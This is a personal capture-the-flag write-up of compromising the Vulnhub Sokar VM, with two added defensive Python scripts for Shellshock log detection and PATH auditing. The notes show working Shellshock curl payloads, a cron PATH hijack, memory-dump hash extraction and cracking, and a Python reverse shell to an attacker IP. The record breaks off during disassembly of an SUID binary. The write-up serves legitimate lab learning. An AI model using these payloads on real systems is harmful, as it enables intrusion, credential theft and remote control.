John Pierce, SLAE, Security+

Hacking the Sokar challenge VM from Vulnhub

Thanks to rasta_mouse and VulnHub for a cool VM.  The following are my notes from working through the challenge.  
 
SokarNotes.txt
 
Loaded up the VM and found its IP.  Start.
 
nmap -n -r -v -T5 -sT 192.168.56.101 -p 1-65535
 
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-23 10:46 CST
Initiating ARP Ping Scan at 10:46
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 10:46, 0.20s elapsed (1 total hosts)
Initiating Connect Scan at 10:46
Scanning 192.168.56.101 [65535 ports]
Discovered open port 591/tcp on 192.168.56.101
Connect Scan Timing: About 36.33% done; ETC: 10:47 (0:00:54 remaining)
Completed Connect Scan at 10:47, 58.29s elapsed (65535 total ports)
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
Not shown: 65534 filtered ports
PORT    STATE SERVICE
591/tcp open  http-alt
MAC Address: 08:00:27:F2:40:DB (Cadmus Computer Systems)
 
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 58.57 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)
 
 
So, there's an HTTP server running on port 591.  A UDP scan showed nothing.  Surfed there and got:
 
<pre>
Sat Jan 23 16:51:07 GMT 2016
16:51:07 up 13 min, 0 users, load average: 0.00, 0.00, 0.00
<br />
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State      
tcp        0      0 :::591                      :::*                        LISTEN      
tcp        0      0 ::ffff:192.168.56.101:591   ::ffff:192.168.56.102:60948 TIME_WAIT   
tcp        0      0 ::ffff:192.168.56.101:591   ::ffff:192.168.56.102:60950 TIME_WAIT   
udp        0      0 0.0.0.0:68                  0.0.0.0:*                               
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  4      [ ]         DGRAM                    8487   /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     7174   @/com/ubuntu/upstart
unix  2      [ ]         DGRAM                    7317   @/org/kernel/udev/udevd
unix  2      [ ]         DGRAM                    9046   
unix  2      [ ]         DGRAM                    8667   
unix  3      [ ]         DGRAM                    7333   
unix  3      [ ]         DGRAM                    7332   
 
Linux 2.6.32-504.1.3.el6.x86_64 (sokar) 01/23/2016 _x86_64_ (1 CPU)
 
avg-cpu:  %user   %nice %system %iowait  %steal   %idle
           0.05    0.00    1.15    0.09    0.00   98.71
 
Device:            tps   Blk_read/s   Blk_wrtn/s   Blk_read   Blk_wrtn
sda               2.20        79.74         6.44      64994       5248
sdb               0.42         3.31         0.00       2700          0
 
</pre>
 
Not sure there's anything of value there other than the kernel version.
 
nikto -host 192.168.56.101 -port 591
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        591
+ Start Time:         2016-01-23 11:22:36 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS)
+ Server leaks inodes via ETags, header found with file /, inode: 36625, size: 244, mtime: Sat Nov 15 06:06:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8352 requests: 5 error(s) and 9 item(s) reported on remote host
+ End Time:           2016-01-23 11:24:38 (GMT-6) (122 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
 
Apache is a bit out of date.  The other items are benign except maybe TRACE, per Nikto.  Maybe this install is old enough that the box is still vulnerable to shellshock through CGI.
 
*********************************
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/whoami)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
apache
----------
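From the defender's side, requests like the ones above leave a distinctive trace in the web server log.  As an added example (not part of these notes), here is a small Python 3 checker that parses Apache combined-format log lines and flags any User-Agent carrying the bash function-definition marker `() {`, reporting what a vulnerable bash would have gone on to execute.  The log lines are constructed to match the curl requests above; nothing here was captured from the VM.

```python
import re

# Bash function-export prefix that the CVE-2014-6271 family keyed on: "() {".
# A vulnerable bash parsed any environment variable starting this way as a
# function definition and ran whatever followed the closing brace.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache combined log format; the User-Agent field may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Constructed sample log (not captured from the VM): the first two lines
# carry the same User-Agent payloads the notes send with curl -A.
SAMPLE_LOG = r'''
192.168.56.102 - - [23/Jan/2016:11:30:01 -0600] "GET /cgi-bin/cat HTTP/1.1" 200 244 "-" "() { :;}; echo -en \"\n\n$(/usr/bin/whoami)\n\n\""
192.168.56.102 - - [23/Jan/2016:11:30:07 -0600] "GET /cgi-bin/cat HTTP/1.1" 200 312 "-" "() { :;}; echo -en \"\n\n$(/bin/ls -l /home)\n\n\""
192.168.56.102 - - [23/Jan/2016:11:31:12 -0600] "GET / HTTP/1.1" 200 244 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/43.0"
192.168.56.102 - - [23/Jan/2016:11:31:15 -0600] "GET /icons/ HTTP/1.1" 200 1024 "-" "curl/7.45.0"
'''


def parse_combined(line):
    """Split one combined-format line into a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["agent"] = rec["agent"].replace('\\"', '"')  # undo Apache's quote escaping
    return rec


def shellshock_hits(log_text):
    """Return (client, request, trailing_command) for every request whose
    User-Agent carries the function-definition marker.  mod_cgi exports every
    request header as an HTTP_* variable, so in production the same check
    belongs on Referer, Cookie and the rest, not only on User-Agent."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse_combined(line)
        if rec is None or not SHELLSHOCK_RE.search(rec["agent"]):
            continue
        # Everything after the function body is what a vulnerable bash would run.
        trailing = rec["agent"].split("}", 1)[1].strip(" ;")
        hits.append((rec["client"], rec["request"], trailing))
    return hits


if __name__ == "__main__":
    for client, request, cmd in shellshock_hits(SAMPLE_LOG):
        print("%s %s -> %s" % (client, request, cmd))
```

The marker regex is the same one most IDS signatures for this bug used; the value of parsing the log rather than grepping it is that the trailing command is recovered per request, which is what an incident responder needs when reconstructing what was run.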
curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /home)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 8
drwx------  2 apophis apophis 4096 Jan  2  2015 apophis
drwxrwxrwx. 2 bynarr  bynarr  4096 Jan 27  2015 bynarr
.
.
.
< removed remaining web page data >
----------
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /home/bynarr)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 16
-rwxr-xr-x 1 root root   368 Jan 27  2015 lime
-rw------- 1 root root 10728 Nov 13  2014 lime.ko
 
----------
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/ls -al /home/bynarr)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 36
drwxrwxrwx. 2 bynarr bynarr  4096 Jan 27  2015 .
drwxr-xr-x. 4 root   root    4096 Dec 30  2014 ..
-rw-------. 1 bynarr bynarr     0 Jan 27  2015 .bash_history
-rw-r--r--. 1 bynarr bynarr    18 Feb 21  2013 .bash_logout
-rw-r--r--. 1 bynarr bynarr   178 Nov 12  2014 .bash_profile
-rw-r--r--. 1 bynarr bynarr   124 Feb 21  2013 .bashrc
-rwxr-xr-x  1 root   root     368 Jan 27  2015 lime
-rw-------  1 root   root   10728 Nov 13  2014 lime.ko
----------
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /etc/group)\n\n"' 192.168.56.101:591/cgi-bin/cat |grep bynarr
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2032    0  2032    0     0   144k      0 --:--:-- --:--:-- --:--:--  152k
forensic:x:500:bynarr
bynarr:x:501:
 
 
Take a look at lime and lime.ko:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/file /home/bynarr/lime*)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
/home/bynarr/lime:    Bourne-Again shell script text executable
/home/bynarr/lime.ko: regular file, no read permission
 
lime looks interesting:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/bynarr/lime)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
#!/bin/bash
echo """
==========================
Linux Memory Extractorator
==========================
"
echo "LKM, add or remove?"
echo -en "> "
 
read -e input
 
if [ $input == "add" ]; then
 
/sbin/insmod /home/bynarr/lime.ko "path=/tmp/ram format=raw"
 
elif [ $input == "remove" ]; then
 
/sbin/rmmod lime
 
else
 
echo "Invalid input, burn in the fires of Netu!"
 
fi
 
So, experimenting:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/home/bynarr/lime add)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
 
==========================
Linux Memory Extractorator
==========================
 
LKM, add or remove?
> Invalid input, burn in the fires of Netu!
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/home/bynarr/lime)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
 
==========================
Linux Memory Extractorator
==========================
 
LKM, add or remove?
> Invalid input, burn in the fires of Netu!
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/echo add |/home/bynarr/lime)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
 
==========================
Linux Memory Extractorator
==========================
 
LKM, add or remove?
 
-------------
So, we have a winner using echo.  What does it do?
 
I looked at the source of lime and found it writes a memory dump to /tmp/ram.  The file is not there, so insmod is failing; insmod must be run as root.
 
 
Taking another approach, I decided to look at the overall file system and see what's available to bynarr.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/find / -user bynarr)\n\n"' 192.168.56.101:591/cgi-bin/cat |grep -v Permission |grep -v proc
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  7774    0  7774    0     0  45208      0 --:--:-- --:--:-- --:--:-- 45461
 
/home/bynarr
/home/bynarr/.bash_logout
/home/bynarr/.bashrc
/home/bynarr/.bash_profile
/home/bynarr/temp
/home/bynarr/.bash_history
/tmp/stats
/var/spool/mail/bynarr
 
Content-type: text/html
 
So, the regular stuff, with a highlight on /tmp/stats and /var/spool/mail/bynarr.
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/ls -al /var/spool/mail)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 12
drwxrwxr-x. 2 root    mail 4096 Dec 30  2014 .
drwxr-xr-x. 8 root    root 4096 Nov 12  2014 ..
-rw-rw----  1 apophis mail    0 Dec 30  2014 apophis
-rw-rw-r--. 1 bynarr  mail  551 Dec 30  2014 bynarr
 
I can only look at bynarr due to permissions, but there's nothing else out there anyway.  Here goes:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /var/spool/mail/bynarr)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
Return-Path: <root@sokar>
Delivered-To: bynarr@localhost
Received:  from root by localhost
Date: Thu, 13 Nov 2014 22:04:31 +0100
Subject: Welcome
 
Dear Bynarr.  Welcome to Sokar Inc. Forensic Development Team.
A user account has been setup for you.
 
UID 500 (bynarr)
GID 500 (bynarr)
    501 (forensic)
 
Password 'fruity'.  Please change this ASAP.
Should you require, you've been granted outbound ephemeral port access on 51242, to transfer non-sensitive forensic dumps out for analysis.
 
All the best in your new role!
 
  -Sokar-
 
This looks promising.  I can create a session on port 51242 and my username and password are bynarr and fruity.
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/find / -name nc)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
/usr/bin/nc
 
Kept getting errors with netcat, no -e or -c options.  Ran the following to see what was up:
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/nc -h 2>/tmp/john.txt)\n\n"' 192.168.56.101:591/cgi-bin/cat
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /tmp/john.txt)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
 [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
 [-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
.
.
.
 
So, there's no command option (-e or -c) in this nc version.  The only services I see running are on 591/tcp and 68/udp; 68/udp is bootpc (the DHCP client), which is unresponsive when I try to connect.
 
So, nothing is working.  Start over.  I need to be able to run something with sudo from a command line while logged in as bynarr.
 
I saw python when I was looking around.

root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/python -V 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
Python 2.6.6
 
 
What modules are available?
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/usr/bin/pydoc modules 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
 
Please wait a moment while I gather a list of all available modules...
 
BaseHTTPServer      bisect              inspect             sgmllib
Bastion             bsddb               io                  sha
CDROM               bz2                 itertools           shelve
.
.
.
base64              imghdr              runpy               zlib
bdb                 imp                 sched               
binascii            imputil             select              
binhex              iniparse            sets                
 
Enter any module name to get more help.  Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
 
There's a full complement it looks like.
 
I have to run something as bynarr, but there's no service that allows login.  There is a cron job running, though: /tmp/stats is owned by bynarr and gets frequent updates, and it looks like iostat output.  Is there write access anywhere in that user's PATH?  I can't inspect his environment while running as apache, so look at the dotfiles found earlier.
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/bynarr/.bash_profile 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
# .bash_profile
 
# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
 
# User specific environment and startup programs
 
PATH=.:$PATH:$HOME/bin
 
export PATH
 
PATH starts with ".", and bynarr's home directory is world-writable, so create an iostat there for the cron job to pick up.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/echo \#\!\/bin\/bash > /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(echo sudo \/home\/bynarr\/lime add >> /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
#!/bin/bash
sudo /home/bynarr/lime add
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/chmod +x /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
-rwxr-xr-x 1 apache apache 34 Jan 24 10:40 /home/bynarr/iostat
 
Now to see if it worked:
 
 curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /tmp 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 261704
-rw-r--r-- 1 apache apache        42 Jan 24 01:23 john.txt
-r--r--r-- 1 root   root   267971584 Jan 24 15:23 ram
-rw-rw-r-- 1 bynarr bynarr      1040 Jan 24 15:28 stats
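What made this work was the combination of a relative PATH entry and a world-writable directory, and both are things a defender can audit.  The following Python 3 script is an added example and not part of the original notes: audit_path() flags relative PATH entries and group/other-writable directories, and demo() rebuilds the layout seen here (PATH=.:$PATH:$HOME/bin with a mode-777 home directory) inside a temporary directory so it runs offline on any box.

```python
import os
import shutil
import stat
import tempfile


def audit_path(path_value, cwd):
    """Return (entry, reason) findings for a PATH string.

    Two things are flagged: entries that are not absolute ("." or an empty
    field), because they resolve against the working directory of whatever
    process uses the PATH, and directories that group or others can write to
    (the sticky bit is treated as mitigating, as for /tmp).
    """
    findings = []
    for entry in path_value.split(":"):
        shown = entry if entry else "(empty)"
        resolved = entry
        if not entry.startswith("/"):
            findings.append((shown, "relative entry, resolves against cwd " + cwd))
            resolved = os.path.join(cwd, entry) if entry else cwd
        try:
            st = os.stat(resolved)
        except OSError:
            findings.append((shown, "does not exist"))
            continue
        if not stat.S_ISDIR(st.st_mode):
            findings.append((shown, "not a directory"))
            continue
        writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if writable and not st.st_mode & stat.S_ISVTX:
            findings.append((shown, "directory writable by group/others (mode %o)"
                             % (st.st_mode & 0o777)))
    return findings


def demo():
    """Rebuild the Sokar layout under a temp dir (constructed, not the VM):
    a cron job runs 'iostat' as a user whose ~/.bash_profile sets
    PATH=.:$PATH:$HOME/bin and whose home directory is mode 777."""
    root = tempfile.mkdtemp()
    try:
        home = os.path.join(root, "bynarr")
        os.mkdir(home)
        os.chmod(home, 0o777)
        system_bin = os.path.join(root, "usr-bin")   # stands in for /usr/bin
        os.mkdir(system_bin)
        os.chmod(system_bin, 0o755)
        path_value = ".:%s:%s/bin" % (system_bin, home)
        # The cron job's cwd is the user's home, so "." is that 777 directory.
        return audit_path(path_value, cwd=home)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for entry, reason in demo():
        print("%-12s %s" % (entry, reason))
```

Run against a real account, the cwd argument is whatever directory cron (or the user's login shell) starts in; for a cron job that is normally the home directory, which is exactly why a "." entry combined with a writable home is a problem.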
 
I'll run strings on the dump and grep it to see if apophis shows up.  I know I'll need to log in as him at some point.
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/usr/bin/strings /tmp/ram| /bin/grep apophis 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
apophis
apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::
apophis
apophis.
apophis
apophis:x:501:502::/home/apophis:/bin/bash
apophis:x:502:
 
Let's try the same with root.  I removed a lot of uninteresting lines.  What's left, and the fact that the dump was created at all, confirm bynarr can sudo "lime add" without a password.
 
home/bynarr ; USER=root ; COMMAND=./lime add
## the root user, without needing the root password.
 
And I may as well remove the hook so cron stops producing memory dumps:
 
curl -A '() { :;}; echo -en "\n\n$(/bin/rm /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
john@dellMint ~ $ curl -A '() { :;}; echo -en "\n\n$(/bin/ls -l /home/bynarr 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
total 16
-rwxr-xr-x 1 root root   368 Jan 27  2015 lime
-rw------- 1 root root 10728 Nov 13  2014 lime.ko
 
Now use John the Ripper to crack the apophis hash.
 
john apophishash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
overdrive        (apophis)
1g 0:00:00:51 DONE (2016-01-24 09:54) 0.01954g/s 720.4p/s 720.4c/s 720.4C/s 4444..holaz
Use the "--show" option to display all of the cracked passwords reliably
Session completed
 
Now we've got two accounts with passwords and a hole in the firewall:
 
bynarr fruity 51242 tcp
apophis overdrive
 
All we need is a shell, and to gain root.
 
I found this at pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 
Edited:
 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",51242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 
Echo that into iostat and see if it will give me a shell as bynarr.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/echo \#\!\/usr/\bin\/python > /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
curl -A '() { :;}; echo -en "\n\n$(/bin/echo import socket,subprocess,os\;s=socket.socket\(socket.AF_INET,socket.SOCK_STREAM\)\;s.connect\(\(\"192.168.56.102\",51242\)\)\;os.dup2\(s.fileno\(\),0\)\; os.dup2\(s.fileno\(\),1\)\; os.dup2\(s.fileno\(\),2\)\;p=subprocess.call\(\[\"\/bin\/sh\",\"-i\"\]\)\; >> /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat
 
And check the results:
 
curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat |head
 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1662    0  1662    0     0   106k      0 --:--:-- --:--:-- --:--:--  108k
 
#!/usr/bin/python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",51242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
 
Content-type: text/html
 
<pre>
 
Make it executable, set up a listener and see if it works.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/chmod 777 /home/bynarr/iostat 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat |head
 
root@kali:~/Documents/sokar_hack# nc -nlvp 51242
listening on [any] 51242 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 41375
sh: no job control in this shell
sh-4.1$ 
 
I've got a shell as bynarr.
 
id
id
uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)
sh-4.1$ su apophis
su apophis
standard in must be a tty
sh-4.1$  /usr/bin/python -c 'import pty;pty.spawn("/bin/sh")'
/usr/bin/python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.1$ su apophis
su apophis
Password: overdrive
 
[apophis@sokar ~]$ find / -user apophis 2>/dev/null|grep -v proc
find / -user apophis 2>/dev/null|grep -v proc
/mnt
/home/apophis
/home/apophis/.bash_logout
/home/apophis/.bashrc
/home/apophis/.bash_profile
/home/apophis/.bash_history
/var/spool/mail/apophis
 
Why would apophis own /mnt?  See what suid files are out there.
 
[apophis@sokar ~]$ find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt
[apophis@sokar ~]$ cat suidfiles.txt
cat suidfiles.txt
.
.
-rwsr-xr-x. 1 root 224912 Feb 22  2013 /usr/libexec/openssh/ssh-keysign
-rws--x--x. 1 root 14280 Oct 15  2014 /usr/libexec/pt_chown
-rwsr-sr-x 1 root 8430 Jan  2  2015 /home/apophis/build
.
.
.
 
So, /home/apophis/build runs suid.  See if I can figure out what it's doing.
 
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
ssh: Could not resolve hostname sokar-dev: Temporary failure in name resolution
fatal: Could not read from remote repository.
 
Please make sure you have the correct access rights
and the repository exists.
 
Tried it again with a long answer to check for an overflow:
 
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
*** buffer overflow detected ***: ./build terminated
======= Backtrace: =========
/lib64/libc.so.6(__fortify_fail+0x37)[0x7f61646b9697]
/lib64/libc.so.6(+0x100580)[0x7f61646b7580]
.
.
.
7f616622e000-7f616624f000 rwxp 00000000 00:00 0                          [heap]
7fffdd358000-7fffdd36d000 rwxp 00000000 00:00 0                          [stack]
7fffdd3ff000-7fffdd400000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted
[apophis@sokar ~]$ base64 build > build.b64
[apophis@sokar ~]$ chmod 777 build.b64
[apophis@sokar home]$ ls -l
ls -l
total 8
drwx------  2 apophis apophis 4096 Jan 24 18:22 apophis
drwxrwxrwx. 2 bynarr  bynarr  4096 Jan 24 17:22 bynarr
[apophis@sokar home]$ chmod 777 apophis
chmod 777 apophis
 
So, I wanted to download the file and take a look locally.  Decided to write it out as base64 and just cat it to a file over the shellshock hole.  From Kali,
 
root@kali:~# curl -A '() { :;}; echo -en "\n\n$(/bin/cat /home/apophis/build.b64 2>&1)\n\n"' 192.168.56.101:591/cgi-bin/cat > build.b64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 12561    0 12561    0     0   972k      0 --:--:-- --:--:-- --:--:-- 1022k
 
Clean up the file a bit, decode and verify:
 
root@kali:~/Documents/sokar_hack# vim build.b64 
root@kali:~/Documents/sokar_hack# base64 -d build.b64 > build
root@kali:~/Documents/sokar_hack# ls -l
total 28
-rw-r--r-- 1 root root   126 Jan 24 09:53 apophishash
-rw-r--r-- 1 root root  8430 Jan 24 12:29 build
-rw-r--r-- 1 root root 11388 Jan 24 12:29 build.b64
root@kali:~/Documents/sokar_hack# md5sum build
9f6c5940f3960b869e23e43fd729fc25  build
root@kali:~/Documents/sokar_hack# 
 
[apophis@sokar ~]$ md5sum build
md5sum build
9f6c5940f3960b869e23e43fd729fc25  build
 
So, our file transferred fine.
 
Running it in gdb with a 'Y' answer, we get:
 
Build? (Y/N) Y
Detaching after fork from child process 1588.
Cloning into '/mnt/secret-project'...
ssh: Could not resolve hostname sokar-dev: Temporary failure in name resolution
fatal: Could not read from remote repository.
 
Please make sure you have the correct access rights
and the repository exists.
 
----------
If I put anything more than one character response, I get an abort due to a stack check upon return from the __gets_chk at 0x9d4.  Need to look at the canary on the stack and see if it's static so I can feed it into the string, fooling the gets_chk function.  
----------
[apophis@sokar ~]$ objdump -d build -M intel
objdump -d build -M intel
 
build:     file format elf64-x86-64
 
 
Disassembly of section .init:
 
<skip some stuff>
 
00000000000008ac <encryptDecrypt>:   ; xor characters with 0x49 ('I')
 8ac: 48 89 fa             mov    rdx,rdi
 8af: 41 b9 00 00 00 00     mov    r9d,0x0
 8b5: 49 c7 c3 ff ff ff ff mov    r11,0xffffffffffffffff
 8bc: 49 89 fa             mov    r10,rdi
 8bf: b8 00 00 00 00       mov    eax,0x0
 8c4: eb 10                 jmp    8d6 <encryptDecrypt+0x2a>
 8c6: 42 0f b6 0c 02       movzx  ecx,BYTE PTR [rdx+r8*1]
 8cb: 83 f1 49             xor    ecx,0x49
 8ce: 42 88 0c 06           mov    BYTE PTR [rsi+r8*1],cl
 8d2: 41 83 c1 01           add    r9d,0x1
 8d6: 4d 63 c1             movsxd r8,r9d
 8d9: 4c 89 d9             mov    rcx,r11
 8dc: 4c 89 d7             mov    rdi,r10
 8df: f2 ae                 repnz scas al,BYTE PTR es:[rdi]
 8e1: 48 f7 d1             not    rcx
 8e4: 48 83 e9 01           sub    rcx,0x1
 8e8: 49 39 c8             cmp    r8,rcx
 8eb: 72 d9                 jb     8c6 <encryptDecrypt+0x1a>
 8ed: f3 c3                 repz ret 
 
00000000000008ef <main>:
 8ef: 55                   push   rbp
 8f0: 48 89 e5             mov    rbp,rsp
 8f3: 41 54                 push   r12
 8f5: 53                   push   rbx
 8f6: 48 83 c4 80           add    rsp,0xffffffffffffff80
 8fa: 64 48 8b 04 25 28 00 mov    rax,QWORD PTR fs:0x28
 901: 00 00 
 903: 48 89 45 e8           mov    QWORD PTR [rbp-0x18],rax
 907: 31 c0                 xor    eax,eax
 ---------------------------
 Build a big string between rbp-0x90 and rbp-0x40
 ';:<f\' +f= .f&%*i:i,\'fs!:&&;f&:\t=d;("s?,-&&;f,:f==,;*&;9d=*,#\'$fi,:f==,;*&;9d=*,#'
 ---------------------------
 909: c7 85 70 ff ff ff 66 mov    DWORD PTR [rbp-0x90],0x3b3a3c66
 910: 3c 3a 3b 
 913: c7 85 74 ff ff ff 66 mov    DWORD PTR [rbp-0x8c],0x27202b66
 91a: 2b 20 27 
